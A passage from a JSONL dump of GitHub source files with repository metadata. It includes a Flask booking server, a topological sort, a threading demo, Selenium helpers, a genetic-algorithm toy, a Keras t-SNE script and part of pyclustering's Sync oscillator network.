loose_filters(\n minPrice, maxPrice, bodyBeginDate, bodyEndDate, maxDistance\n )\n withRecommendedPosts = get_posts_query_wrapper(\n user_id, type, minPrice, maxPrice, bodyBeginDate, bodyEndDate, lng, lat, hide_user_id, maxDistance, includeBlocked\n )\n recommendedPosts = [post for post in withRecommendedPosts if post not in searchPosts]\n for post in recommendedPosts:\n post[\"recommended\"] = True\n print(\"Searched: \", len(searchPosts), \" Recommended: \", len(recommendedPosts))\n return make_response(jsonify(searchPosts + recommendedPosts), 200)\n\n\n@app.route('/bookings', methods=['GET'])\ndef get_bookings():\n guest_user_id = request.args.get('guest_user_id')\n user_id = request.args.get('user_id')\n post_id = request.args.get('post_id')\n status = request.args.get('status')\n booking_id = request.args.get('booking_id')\n bookings = use_db(conn, get_bookings_query(guest_user_id, user_id, post_id, status, booking_id), many=True)\n parsed_bookings = []\n for b_id, u_id, w_id, gu_id, gw_id, p_id, status, tx, res_tx, begin_date, end_date, creation_date in bookings:\n parsed_bookings.append({\"booking_id\": b_id, \"user_id\": u_id, \"wallet_id\": w_id,\n \"guest_user_id\": gu_id, \"guest_wallet_id\": gw_id, \"post_id\": p_id, \"status\": status,\n \"transaction\": tx, \"response_transaction\": res_tx, \"creation_date\": creation_date.strftime('%Y-%m-%d'),\n \"begin_date\": begin_date.strftime('%Y-%m-%d'),\n \"end_date\": end_date.strftime('%Y-%m-%d')})\n return make_response(jsonify(parsed_bookings), 200)\n\n\n@app.route('/bookings', methods=['POST'])\ndef new_booking():\n body = request.json\n # TODO Validar availavility\n roomTransaction = use_db(conn, get_post_transaction_query(body['post_id']))[0]\n beginDate = datetime.datetime.strptime(body['begin_date'], '%Y-%m-%d')\n endDate = datetime.datetime.strptime(body['end_date'], '%Y-%m-%d')\n response = requests.post(payments_base_url + 'booking', json={\"wallet_id\": body['wallet_id'],\n \"room_transaction\": roomTransaction,\n \"day\": beginDate.day,\n \"month\": beginDate.month,\n \"year\": beginDate.year,\n \"end_day\": endDate.day,\n \"end_month\": endDate.month,\n \"end_year\": endDate.year})\n if response.status_code == 200:\n host_id = use_db(conn, get_user_id_of_post_query(body['post_id']))\n print(\"host_id:\", host_id)\n print('sarasa', str(host_id[0]))\n sys.stdout.flush()\n # TODO Notificar al host que intentaron reservar\n send_notification(str(host_id[0]), \"Intentaron reservar tu alojamiento\",\n \"Desde el \" + str(beginDate) + \" hasta el \" + str(endDate))\n b_id, u_id, w_id, gu_id, gw_id, p_id, status, tx, res_tx, begin_date, end_date, creation_date, = use_db(conn,\n add_booking_query(\n body.get('host_user_id'),\n body.get('host_wallet_id'),\n body['user_id'],\n body['wallet_id'],\n body['post_id'],\n 'pending',\n response.json()[\n 'intentTransaction'],\n body['begin_date'],\n body['end_date']\n ))\n return make_response(\n jsonify(post_id=p_id, guest_user_id=gu_id, guest_wallet_id=gw_id, booking_id=b_id,\n begin_date=body['begin_date'], creation_date=creation_date.strftime('%Y-%m-%d'),\n end_date=body['end_date'], status=status, transaction=tx), 201)\n return make_response(response.content, 500)\n\n\n@app.route('/rejectance', methods=['POST'])\ndef reject_booking():\n body = request.json\n roomTransaction = use_db(conn, get_post_transaction_query(body['post_id']))[0]\n beginDate = datetime.datetime.strptime(body['begin_date'], '%Y-%m-%d')\n endDate = datetime.datetime.strptime(body['end_date'], '%Y-%m-%d')\n response = requests.post(payments_base_url + 'rejectance', json={\"wallet_id\": body['wallet_id'],\n \"guest_wallet_id\": body['guest_wallet_id'],\n \"room_transaction\": roomTransaction,\n \"day\": beginDate.day,\n \"month\": beginDate.month,\n \"year\": beginDate.year,\n \"end_day\": endDate.day,\n \"end_month\": endDate.month,\n \"end_year\": endDate.year})\n if response.status_code == 200:\n send_notification(body['guest_user_id'], \"Reservación rechazada\", \"Volvé a intentarlo\")\n b_id, u_id, w_id, gu_id, gw_id, p_id, status, tx, res_tx, begin_date, end_date, creation_date, = use_db(conn, respond_booking_query(\n body['user_id'],\n body['wallet_id'],\n 'rejected',\n response.json()['rejectTransaction'],\n body['end_date'],\n body['begin_date'],\n body['guest_wallet_id'],\n body['post_id']\n ))\n return make_response(\n jsonify(post_id=p_id, guest_user_id=gu_id, guest_wallet_id=gw_id, booking_id=b_id,\n begin_date=body['begin_date'], creation_date=creation_date.strftime('%Y-%m-%d'),\n user_id=u_id, wallet_id=w_id, end_date=body['end_date'], status=status, transaction=tx,\n rejectTrasaction=res_tx),\n 201)\n return make_response(response.content, 500)\n\n\n@app.route('/acceptance', methods=['POST'])\ndef accept_booking():\n body = request.json\n roomTransaction = use_db(conn, get_post_transaction_query(body['post_id']))[0]\n beginDate = datetime.datetime.strptime(body['begin_date'], '%Y-%m-%d')\n endDate = datetime.datetime.strptime(body['end_date'], '%Y-%m-%d')\n response = requests.post(payments_base_url + 'acceptance', json={\"wallet_id\": body['wallet_id'],\n \"guest_wallet_id\": body['guest_wallet_id'],\n \"room_transaction\": roomTransaction,\n \"day\": beginDate.day,\n \"month\": beginDate.month,\n \"year\": beginDate.year,\n \"end_day\": endDate.day,\n \"end_month\": endDate.month,\n \"end_year\": endDate.year})\n if response.status_code == 200:\n # TODO Notificar al guest que se acepto la reserva\n send_notification(body['guest_user_id'], \"Reservación confirmada\", \"¡Que disfrutes tu alojamiento!\")\n b_id, u_id, w_id, gu_id, gw_id, p_id, status, tx, res_tx, begin_date, end_date, creation_date, = use_db(conn,\n respond_booking_query(\n body['user_id'],\n body['wallet_id'],\n 'accepted',\n response.json()[\n 'acceptTransaction'],\n body['end_date'],\n body['begin_date'],\n body[\n 'guest_wallet_id'],\n body['post_id']\n ))\n acceptResponse = make_response(\n jsonify(post_id=p_id, guest_user_id=gu_id, guest_wallet_id=gw_id, booking_id=b_id,\n begin_date=body['begin_date'], creation_date=creation_date.strftime('%Y-%m-%d'),\n user_id=u_id, wallet_id=w_id, end_date=body['end_date'], status=status, transaction=tx,\n acceptTrasaction=res_tx), 201)\n overlappingBookings = use_db(conn,\n overlapping_bookings_query(body['post_id'], body['begin_date'], body['end_date']),\n many=True)\n for b_id, u_id, w_id, gu_id, gw_id, p_id, status, tx, res_tx, begin_date, end_date, creation_date in overlappingBookings:\n response = requests.post(payments_base_url + 'rejectance', json={\"wallet_id\": body['wallet_id'],\n \"guest_wallet_id\": gw_id,\n \"room_transaction\": roomTransaction,\n \"day\": begin_date.day,\n \"month\": begin_date.month,\n \"year\": begin_date.year,\n \"end_day\": end_date.day,\n \"end_month\": end_date.month,\n \"end_year\": end_date.year})\n if response.status_code == 200:\n # TODO Notificar al guest que se rechazo la reserva\n send_notification(str(gu_id), \"Reservación rechazada\", \"Volvé a intentarlo\")\n resValues = use_db(conn, respond_booking_query(\n body['user_id'],\n body['wallet_id'],\n 'rejected',\n response.json()['rejectTransaction'],\n end_date,\n begin_date,\n gw_id,\n p_id\n ))\n else:\n print(\"Fallo el rechazo\", response.content)\n return acceptResponse\n return make_response(response.content, 500)\n\n\n# endpoint para pruebas internas\n@app.route('/notifications', methods=['POST'])\ndef notifications():\n user_id = request.json['user_id']\n msg_title = request.json['msg_title']\n msg_body = request.json['msg_body']\n\n result = send_notification(str(user_id), msg_title, msg_body)\n print(result)\n\n return make_response(result, 200)\n\n\n@app.route('/tokens', methods=['POST'])\ndef save_tokens():\n save_token(request.json['user_id'], request.json['token_id'])\n return make_response(\"{\\\"msg\\\" : \\\"ok\\\"}\", 201)\n\n\n@app.route('/posts/metrics')\ndef metrics_posts():\n from_date = request.args.get('from_date')\n to_date = request.args.get('to_date')\n res = use_db(conn, count_posts_between_dates(from_date, to_date), many=True)\n if res is not []:\n return make_response(json.dumps([{\"name\": row[0].strftime('%d-%m-%Y'), \"value\": row[1]} for row in res]), 200)\n else:\n print(\"no hay publicaciones\")\n sys.stdout.flush()\n return make_response(\"{\\\"msg\\\" : \\\"empty\\\"}\", 204)\n\n\n@app.route('/bookings/metrics')\ndef metrics_bookings():\n from_date = request.args.get('from_date')\n to_date = request.args.get('to_date')\n res = use_db(conn, count_bookings_between_dates(from_date, to_date), many=True)\n if res is not []:\n return make_response(json.dumps([{\"name\": row[0].strftime('%d-%m-%Y'), \"value\": row[1]} for row in res]), 200)\n else:\n print(\"no hay bookings\")\n sys.stdout.flush()\n return make_response(\"{\\\"msg\\\" : \\\"empty\\\"}\", 204)\n\n\n@app.route('/tokens', methods=['DELETE'])\ndef delete_tokens():\n reset_tokens()\n return make_response(\"{\\\"msg\\\" : \\\"ok\\\"}\", 200)\n\n\n@app.route('/tokens')\ndef tokens():\n return make_response(json.dumps(get_tokens()), 200)\n\n\nif __name__ == '__main__':\n try:\n app.run(port=os.environ['PORT'])\n except KeyError:\n app.run()\n disconnect(conn)\n","repo_name":"fiuba-taller2-g3/posts-server","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":27344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9951682875","text":"import sys\n\n\nclass Graf:\n def __init__(self, stevk): # konstruktor\n # self.graf = defaultdict(list)\n self.V = stevk\n self.graf = {}\n for i in range(self.V):\n self.graf[i+1] = []\n\n self.visited = []\n self.queue = []\n self.developing = []\n self.cycle = False\n\n def dodaj(self, od, do): # doda povezavo\n self.graf[od].append(do)\n\n def topo_sort(self): # zalaufa algo\n for u in self.graf:\n if u not in self.visited:\n self.razvij(u)\n if self.cycle:\n print(\"nemogoce\")\n return -1\n\n return self.queue\n\n def razvij(self, u):\n self.developing.append(u)\n if self.cycle:\n return\n\n for v in self.graf[u]:\n if v not in self.visited and v not in self.developing:\n self.razvij(v)\n elif v in self.developing:\n self.cycle = True\n break\n\n self.queue.insert(0, u)\n self.developing.remove(u)\n self.visited.append(u)\n\n\ndef find_max_digit(i, g, max, queue):\n index = queue[i]\n if i >= g.V - 1:\n return\n for e in g.graf[index]:\n if max[e-1] >= max[index - 1]:\n max[e-1] = max[index - 1] - 1\n find_max_digit(i + 1, g, max, queue)\n\n\ndef find_min_digit(i, g, queue, value=1):\n tmp = value\n for e in g.graf[i]:\n new = find_min_digit(e, g, queue, value + 1)\n if new > tmp:\n tmp = new\n return tmp\n\n\ndef find_numbers(q, graf):\n max_num = [9] * graf.V\n min_num = [1] * graf.V\n\n for i in range(graf.V):\n find_max_digit(i, graf, max_num, q)\n min_num[q[i] - 1] = find_min_digit(q[i], graf, q)\n\n if all(0 < i < 10 for i in max_num):\n return max_num, min_num\n else:\n return -1, -1\n\n\nexamples = 0\ncount = 0\nconditions = 0\ngraph = None\nfor line in sys.stdin:\n line = line.rstrip()\n chars = line.split(\" \")\n if examples == 0:\n examples = int(line)\n continue\n\n if \">\" not in chars and \"<\" not in chars: # nov graf\n count = 0\n graph = Graf(int(chars[0]))\n conditions = int(chars[1])\n\n elif \">\" in chars and count < conditions: # dodamo povezavo od do\n count += 1\n graph.dodaj(int(chars[0]), int(chars[2]))\n\n elif \"<\" in chars and count < conditions: # dodamo povezavo do od\n count += 1\n graph.dodaj(int(chars[2]), int(chars[0]))\n\n if count == conditions: # zalaufamo algo\n count = 0\n queue = graph.topo_sort()\n if queue != -1:\n max, min = find_numbers(queue, graph)\n if max != -1 and min != -1:\n max = map(str, max)\n min = map(str, min)\n # print(\"Min number: \" + ''.join(min))\n # print(\"Max number: \" + ''.join(max))\n print(''.join(min) + \" \" + ''.join(max))\n else:\n print(\"nemogoce\")\n","repo_name":"pseudobun/solo-projects","sub_path":"python_projects/topo_sort/topo_sort.py","file_name":"topo_sort.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"806629595","text":"#生产者 和 消费者\n#生产者 的线程专门用来产生数据 存到中间变量中\n#消费者从中间变量中 取出数据 进行消费\n#中间 变量 作为全局变量\n#需要使用锁 保证全局变量的完整性\nimport random\nimport threading\nimport time\ngCondition = threading.Condition()\ngMoney = 1000\ngTotalTime = 30 #规定次数\ngTime = 0\n\n\nclass ProducerThread(threading.Thread):\n def run(self):\n global gMoney\n global gTime\n while True:\n money = random.randint(99,999) #产生随机整型值 每次挣的钱\n gCondition.acquire() #操作全局变量 上锁\n if gTime >= gTotalTime:\n gCondition.release()\n break\n gMoney += money #修改全局变量\n print(\"%s生产了%d元钱,余额为%d元\" %(threading.current_thread(),money,gMoney))\n\n gTime += 1\n gCondition.notify_all()#通知所有正在等待的线程\n gCondition.release() #线程结束 释放锁\n time.sleep(1)\n\nclass CustomerThread(threading.Thread):\n def run(self):\n global gMoney\n while True: #死循环\n money = random.randint(99,999) #随机���费的钱\n gCondition.acquire() #上锁\n while gMoney < money:\n #if 判断完了之后立即执行 下面的语句\n #while 执行完了以后回来再判断一次\n #避免了 等待有钱以后去消费 发现还是余额不足\n if gTime >= gTotalTime:\n gCondition.release()#超过了10次\n return #用return 替换 break 目的是 return 返回所有\n print(\"%s准备消费%d元钱,余额为%d元,余额不足\" % (threading.current_thread(), money, gMoney))\n gCondition.wait() #如果余额不足 等待 notify_all 的通知\n gMoney -= money\n print(\"%s消费了%d元钱,余额为%d元\" % (threading.current_thread(), money, gMoney))\n gCondition.release()\n time.sleep(1)\n\n\ndef main():\n for x in range(3):\n t = ProducerThread()\n t.start()\n for x in range(3):\n t = CustomerThread()\n t.start()\n\nif __name__ == \"__main__\":\n main()","repo_name":"gaohj/python1902crawer","sub_path":"day6/threading_demo/demo6.py","file_name":"demo6.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24652753299","text":"class Person:\n \"\"\"\n class for storing information about a person\n\n Parameters:\n first_name (str): first name of the person\n last_name (str): last name of the person\n birth_year (int): year of birth of the person\n \"\"\"\n\n def __init__(self, first_name, last_name, birth_year):\n self.first_name = first_name\n self.last_name = last_name\n self.birth_year = birth_year\n\n","repo_name":"aninstan/skole","sub_path":"objektorientering/oppgave 3.py","file_name":"oppgave 3.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42706225777","text":"from selenium.webdriver.common.by import By\nfrom Testdata import test_data\nfrom Helper import test_logger\nfrom Helper import helpers\nimport random\n\n\naccessories_link = (By.XPATH, \"//a[@href='/accessories']\")\nwatches_link = (By.XPATH, \"//article/a[contains(@href, 'women-watches')]\")\naccount_favs = (By.XPATH, \"//a[@href='/account/favorites']\")\nfavs_numbers = (By.XPATH, \"//a[text()='Hearts']//following::span\")\nhearts_to_add_favs = (By.XPATH, \"//button[@data-test-id='heartButton']\")\n\n\ndef add_to_favorites():\n try:\n hearts = helpers.find_all(hearts_to_add_favs)\n for i in range(len(hearts)):\n random.choices(hearts, k=6)[i].click()\n test_logger.logger(\"Items are favoritized\")\n except Exception as e:\n test_logger.logger(e)\n","repo_name":"tatevgyurjyan/Automation-Frameworks","sub_path":"Automation_Framework_6pm/Pages/favorites.py","file_name":"favorites.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28404905183","text":"#!/usr/bin/env python3\n\nimport os, sys, pathlib, argparse\nfrom obt import docker, host, path\nimport obt.pathtools\nimport obt._globals\n\n##########################################\n# build dep dict\n##########################################\n\ndockermodules = docker.enumerate()\n\n##########################################\n\nimport obt.deco\ndeco = obt.deco.Deco()\n\n#print(dockermodules)\n\nline_index = 0\nfor key in dockermodules:\n\todd = line_index&1\n\tval = str(dockermodules[key]._module.info())\n\tif val!=\"???\":\n\t col_k = deco.rgbstr(255,255,0,key) if odd else deco.rgbstr(192,192,0,key)\n\t col_v = deco.rgbstr(255,255,255,val) if odd else deco.rgbstr(192,192,192,val)\n\t line = \"%27s\" % col_k\n\t line += \" \" + deco.magenta(\":\") + \" \"\n\t line += col_v\n\t print(line)\n\t line_index += 1\n","repo_name":"tweakoz/ork.build","sub_path":"bin_priv/obt.docker.list.py","file_name":"obt.docker.list.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"41975188688","text":"from castle_piece import Piece\nfrom random import randint, choice\n\n\nclass Castle:\n def __init__(self, pieces, all_pieces):\n self.selection_probability = None\n self.pieces = pieces\n self.total_cost = sum([piece.cost for piece in pieces])\n self.all_pieces = all_pieces\n self.validate()\n\n def __repr__(self):\n rep = \"\"\n for piece in self.pieces:\n rep += f\"{piece}\\n\"\n rep += f\"Total cost: {self.total_cost}\\n\"\n return rep\n\n def __gt__(self, other):\n return self.fitness() > other.fitness()\n\n def validate(self):\n \"\"\"\n\n make sure just one door\n\n \"\"\"\n door_count = list(filter(lambda p: p.type == \"door\", self.pieces))\n lookout_count = list(filter(lambda p: p.type == \"lookout\", self.pieces))\n if len(door_count) > 1:\n while len(door_count) > 1:\n to_remove = choice(door_count)\n self.pieces.remove(to_remove)\n door_count.remove(to_remove)\n elif len(door_count) == 0:\n self.pieces.append([p for p in self.all_pieces if p.type == \"door\"][0])\n if len(lookout_count) > 1:\n while len(lookout_count) > 1:\n to_remove = choice(lookout_count)\n self.pieces.remove(to_remove)\n lookout_count.remove(to_remove)\n elif len(lookout_count) == 0:\n self.pieces.append([p for p in self.all_pieces if p.type == \"lookout\"][0])\n\n def zero_fitness_condition(self):\n max_height = self.pieces[0].strength\n if len(self.pieces) > max_height:\n return False\n previous_piece = self.pieces[0]\n for piece in self.pieces:\n if piece.width > previous_piece.width:\n return False\n if self.pieces[0].type != \"door\" or self.pieces[-1].type != \"lookout\":\n return False\n return True\n\n def fitness(self):\n if self.zero_fitness_condition():\n return 10 + (len(self.pieces) ** 2) - self.total_cost\n else:\n return 0\n\n def mutate(self):\n piece_A = choice(self.pieces)\n piece_B = choice(self.pieces)\n self.pieces[self.pieces.index(piece_A)] = piece_B\n self.pieces[self.pieces.index(piece_B)] = piece_A\n\n def set_selection_probability(self, selection_probablity):\n self.selection_probability = selection_probablity\n\n def crossover(self, other):\n child_one = Castle(self.pieces.copy()[:len(self.pieces) // 2] + other.pieces.copy()[len(self.pieces) // 2:],\n self.all_pieces)\n child_two = Castle(other.pieces.copy()[:len(other.pieces) // 2] + self.pieces.copy()[len(other.pieces) // 2:],\n self.all_pieces)\n return child_one, child_two\n","repo_name":"kush5683/CS","sub_path":"4341/Assignment 2/castle.py","file_name":"castle.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21774523401","text":"# Initialize an empty dictionary: counts_dict of the counts of how many times each country appears in a column in the dataset\ncounts_dict = {}\n# Open a connection to the file\nwith open('world_dev_ind.csv') as file:\n\n # Iterate over the generator from read_large_file()\n for line in read_large_file(file):\n\n row = line.split(',')\n first_col = row[0]\n\n if first_col in counts_dict.keys():\n counts_dict[first_col] += 1\n else:\n counts_dict[first_col] = 1\n# Print \nprint(counts_dict)\n","repo_name":"Lina-Ennia/World-bank-data-Project","sub_path":"counts_country_in_a_column.py","file_name":"counts_country_in_a_column.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71013895146","text":"import os\nimport keras\nimport keras.backend as K\nimport numpy as np\nfrom tqdm import tqdm\nfrom datagen import cost_func, TSNEBatchGenerator\n\ndef cost_func(y_true, y_pred):\n x_batch = y_true\n y_batch = y_pred\n\n # batch_size = K.int_shape(x_batch)[0]\n batch_size = 1 \n\n x_batch = K.reshape(x_batch, (batch_size, -1))\n y_batch = K.reshape(y_batch, (batch_size, -1))\n\n sigma = 784 / np.sqrt(2)\n\n rx = K.tf.reduce_sum( x_batch * x_batch, 1)\n rx = K.reshape(rx, (-1, 1))\n Gx = rx - 2 * K.tf.matmul(x_batch, K.tf.transpose(x_batch)) + K.tf.transpose(rx)\n x_numerator = K.exp( - Gx / (2 * np.square(sigma)))\n x_denominator = K.tf.reduce_sum(x_numerator)\n \n ry = K.tf.reduce_sum( y_batch * y_batch, 1)\n ry = K.reshape(ry, (-1, 1))\n Gy = ry - 2 * K.tf.matmul(y_batch, K.tf.transpose(y_batch)) + K.tf.transpose(ry)\n y_numerator = 1 / (1 + Gy)\n y_denominator = K.tf.reduce_sum(y_numerator)\n\n P = x_numerator / x_denominator\n Q = y_numerator / y_denominator\n\n KL = K.tf.reduce_sum(P * K.log(P / Q))\n return KL\n\nmodel = keras.models.load_model(\"./log/base1121/bestweights.hdf5\", custom_objects={\"cost_func\": cost_func})\nmodel.summary()\n\nbg = TSNEBatchGenerator(batch_size=1)\n\n\ny_latent = []\nfor i in tqdm(range(bg.num)):\n X, _ = bg.__getitem__(i)\n y = model.predict(X)[0]\n y_latent.append(y)\n \ny_latent = np.array(y_latent)\nnp.save( os.path.join(\"./log/base1121/\", \"y_latent.npy\"), y_latent)\n \n\n","repo_name":"yumaloop/keras-tSNE","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32431359052","text":"\"\"\"!\r\n\r\n@brief Neural Network: Oscillatory Neural Network based on Kuramoto model\r\n@details Based on article description:\r\n - A.Arenas, Y.Moreno, C.Zhou. Synchronization in complex networks. 2008.\r\n - X.B.Lu. Adaptive Cluster Synchronization in Coupled Phase Oscillators. 2009.\r\n - X.Lou. Adaptive Synchronizability of Coupled Oscillators With Switching. 2012.\r\n - A.Novikov, E.Benderskaya. Oscillatory Neural Networks Based on the Kuramoto Model. 2014.\r\n\r\n@authors Andrei Novikov (spb.andr@yandex.ru)\r\n@version 1.0\r\n@date 2014-2015\r\n@copyright GNU Public License\r\n\r\n@cond GNU_PUBLIC_LICENSE\r\n PyClustering is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n \r\n PyClustering is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n \r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see .\r\n@endcond\r\n\r\n\"\"\"\r\n\r\n\r\nimport numpy;\r\nimport random;\r\n\r\nimport pyclustering.core.wrapper as wrapper;\r\n\r\nfrom scipy import pi;\r\nfrom scipy.integrate import odeint;\r\nfrom scipy.integrate import ode;\r\n\r\nfrom pyclustering.support import euclidean_distance;\r\n\r\nfrom pyclustering.nnet import *;\r\n\r\n\r\nclass sync_network(network, network_interface): \r\n \"\"\"!\r\n @brief Model of oscillatory network that is based on the Kuramoto model of synchronization.\r\n \r\n \"\"\"\r\n \r\n # Protected members:\r\n _name = 'Phase Sync Network'\r\n _phases = None; # Current phases of oscillators.\r\n _freq = None; # Own frequencies of oscillators.\r\n _weight = 0; # Strength of connections between oscillators.\r\n \r\n _ccore_network_pointer = None; # Pointer to CCORE Sync implementation of the network.\r\n \r\n # Properties of class that represents oscillatory neural network\r\n @property\r\n def phases(self):\r\n \"\"\"!\r\n @brief Returns list of phases of oscillators.\r\n \r\n @return (list) Phases of oscillators.\r\n \r\n \"\"\"\r\n \r\n return self._phases;\r\n\r\n\r\n def __init__(self, num_osc, weight = 1, frequency = 0, type_conn = conn_type.ALL_TO_ALL, conn_represent = conn_represent.MATRIX, initial_phases = initial_type.RANDOM_GAUSSIAN, ccore = False):\r\n \"\"\"!\r\n @brief Constructor of oscillatory network is based on Kuramoto model.\r\n \r\n @param[in] num_osc (uint): Number of oscillators in the network.\r\n @param[in] weight (double): Coupling strength of the links between oscillators.\r\n @param[in] frequency (double): Multiplier of internal frequency of the oscillators.\r\n @param[in] type_conn (conn_type): Type of connection between oscillators in the network (all-to-all, grid, bidirectional list, etc.).\r\n @param[in] conn_represent (conn_represent): Internal representation of connection in the network: matrix or list.\r\n @param[in] initial_phases (initial_type): Type of initialization of initial phases of oscillators (random, uniformly distributed, etc.).\r\n @param[in] ccore (bool): If True simulation is performed by CCORE library (C++ implementation of pyclustering).\r\n \r\n \"\"\"\r\n \r\n if (ccore is True):\r\n self._ccore_network_pointer = wrapper.create_sync_network(num_osc, weight, frequency, type_conn, initial_phases);\r\n else: \r\n super().__init__(num_osc, type_conn, conn_represent);\r\n \r\n self._weight = weight;\r\n \r\n self._phases = list();\r\n self._freq = list();\r\n \r\n for index in range(0, num_osc, 1): \r\n if (initial_phases == initial_type.RANDOM_GAUSSIAN):\r\n self._phases.append(random.random() * 2.0 * pi);\r\n elif (initial_phases == initial_type.EQUIPARTITION):\r\n self._phases.append( pi / num_osc * index);\r\n \r\n self._freq.append(random.random() * frequency);\r\n \r\n \r\n def __del__(self):\r\n \"\"\"!\r\n @brief Destructor of oscillatory network is based on Kuramoto model.\r\n \r\n \"\"\"\r\n \r\n if (self._ccore_network_pointer is not None):\r\n wrapper.destroy_sync_network(self._ccore_network_pointer);\r\n self._ccore_network_pointer = None;\r\n \r\n \r\n def sync_order(self):\r\n \"\"\"!\r\n @brief Calculates level of global synchorization in the network.\r\n \r\n @return (double) Level of global synchronization.\r\n \r\n @see sync_local_order()\r\n \r\n \"\"\"\r\n \r\n if (self._ccore_network_pointer is not None):\r\n return wrapper.sync_order(self._ccore_network_pointer);\r\n \r\n exp_amount = 0;\r\n average_phase = 0;\r\n \r\n for index in range(0, self.num_osc, 1):\r\n exp_amount += math.expm1( abs(1j * self._phases[index]) );\r\n average_phase += self._phases[index];\r\n \r\n exp_amount /= self.num_osc;\r\n average_phase = math.expm1( abs(1j * (average_phase / self.num_osc)) );\r\n \r\n return abs(average_phase) / abs(exp_amount); \r\n \r\n \r\n def sync_local_order(self):\r\n \"\"\"!\r\n @brief Calculates level of local (partial) synchronization in the network.\r\n \r\n @return (double) Level of local (partial) synchronization.\r\n \r\n @see sync_order()\r\n \r\n \"\"\"\r\n \r\n if (self._ccore_network_pointer is not None):\r\n return wrapper.sync_local_order(self._ccore_network_pointer);\r\n \r\n exp_amount = 0;\r\n num_neigh = 0;\r\n \r\n for i in range(0, self.num_osc, 1):\r\n for j in range(0, self.num_osc, 1):\r\n if (self.has_connection(i, j) == True):\r\n exp_amount += math.exp(-abs(self._phases[j] - self._phases[i]));\r\n num_neigh += 1;\r\n \r\n if (num_neigh == 0):\r\n num_neigh = 1;\r\n \r\n return exp_amount / num_neigh; \r\n \r\n \r\n def _phase_kuramoto(self, teta, t, argv):\r\n \"\"\"!\r\n @brief Returns result of phase calculation for specified oscillator in the network.\r\n \r\n @param[in] teta (double): Phase of the oscillator that is differentiated.\r\n @param[in] t (double): Current time of simulation.\r\n @param[in] argv (tuple): Index of the oscillator in the list.\r\n \r\n @return (double) New phase for specified oscillator (don't assign here).\r\n \r\n \"\"\"\r\n \r\n index = argv;\r\n phase = 0;\r\n for k in range(0, self.num_osc):\r\n if (self.has_connection(index, k) == True):\r\n phase += math.sin(self._phases[k] - teta);\r\n \r\n return ( self._freq[index] + (phase * self._weight / self.num_osc) ); \r\n \r\n \r\n def allocate_sync_ensembles(self, tolerance = 0.01):\r\n \"\"\"!\r\n @brief Allocate clusters in line with ensembles of synchronous oscillators where each\r\n synchronous ensemble corresponds to only one cluster.\r\n \r\n @param[in] tolerance (double): Maximum error for allocation of synchronous ensemble oscillators.\r\n \r\n @return (list) Grours (lists) of indexes of synchronous oscillators.\r\n For example [ [index_osc1, index_osc3], [index_osc2], [index_osc4, index_osc5] ].\r\n \r\n \"\"\"\r\n \r\n if (self._ccore_network_pointer is not None):\r\n return wrapper.allocate_sync_ensembles_sync_network(self._ccore_network_pointer, tolerance);\r\n \r\n clusters = [];\r\n if (self._num_osc > 0):\r\n clusters.append([0]);\r\n \r\n for i in range(1, self._num_osc, 1):\r\n cluster_allocated = False;\r\n for cluster in clusters:\r\n for neuron_index in cluster:\r\n if ( (self._phases[i] < (self._phases[neuron_index] + tolerance)) and (self._phases[i] > (self._phases[neuron_index] - tolerance)) ):\r\n cluster_allocated = True;\r\n cluster.append(i);\r\n break;\r\n \r\n if (cluster_allocated == True):\r\n break;\r\n \r\n if (cluster_allocated == False):\r\n clusters.append([i]);\r\n \r\n return clusters;\r\n \r\n \r\n def simulate(self, steps, time, solution = solve_type.FAST, collect_dynamic = True):\r\n \"\"\"!\r\n @brief Performs static simulation of Sync oscillatory network.\r\n \r\n @param[in] steps (uint): Number steps of simulations during simulation.\r\n @param[in] time (double): Time of simulation.\r\n @param[in] solution (solve_type): Type of solution (solving).\r\n @param[in] collect_dynamic (bool): If True - returns whole dynamic of oscillatory network, otherwise returns only last values of dynamics.\r\n \r\n @return (list) Dynamic of oscillatory network. If argument 'collect_dynamic' = True, than return dynamic for the whole simulation time,\r\n otherwise returns only last values (last step of simulation) of dynamic.\r\n \r\n @see simulate_dynamic()\r\n @see simulate_static()\r\n \r\n \"\"\"\r\n \r\n return self.simulate_static(steps, time, solution, collect_dynamic);\r\n\r\n\r\n def simulate_dynamic(self, order = 0.998, solution = solve_type.FAST, collect_dynamic = False, step = 0.1, int_step = 0.01, threshold_changes = 0.0000001):\r\n \"\"\"!\r\n @brief Performs dynamic simulation of the network until stop condition is not reached. Stop condition is defined by input argument 'order'.\r\n \r\n @param[in] order (double): Order of process synchronization, destributed 0..1.\r\n @param[in] solution (solve_type): Type of solution.\r\n @param[in] collect_dynamic (bool): If True - returns whole dynamic of oscillatory network, otherwise returns only last values of dynamics.\r\n @param[in] step (double): Time step of one iteration of simulation.\r\n @param[in] int_step (double): Integration step, should be less than step.\r\n @param[in] threshold_changes (double): Additional stop condition that helps prevent infinite simulation, defines limit of changes of oscillators between current 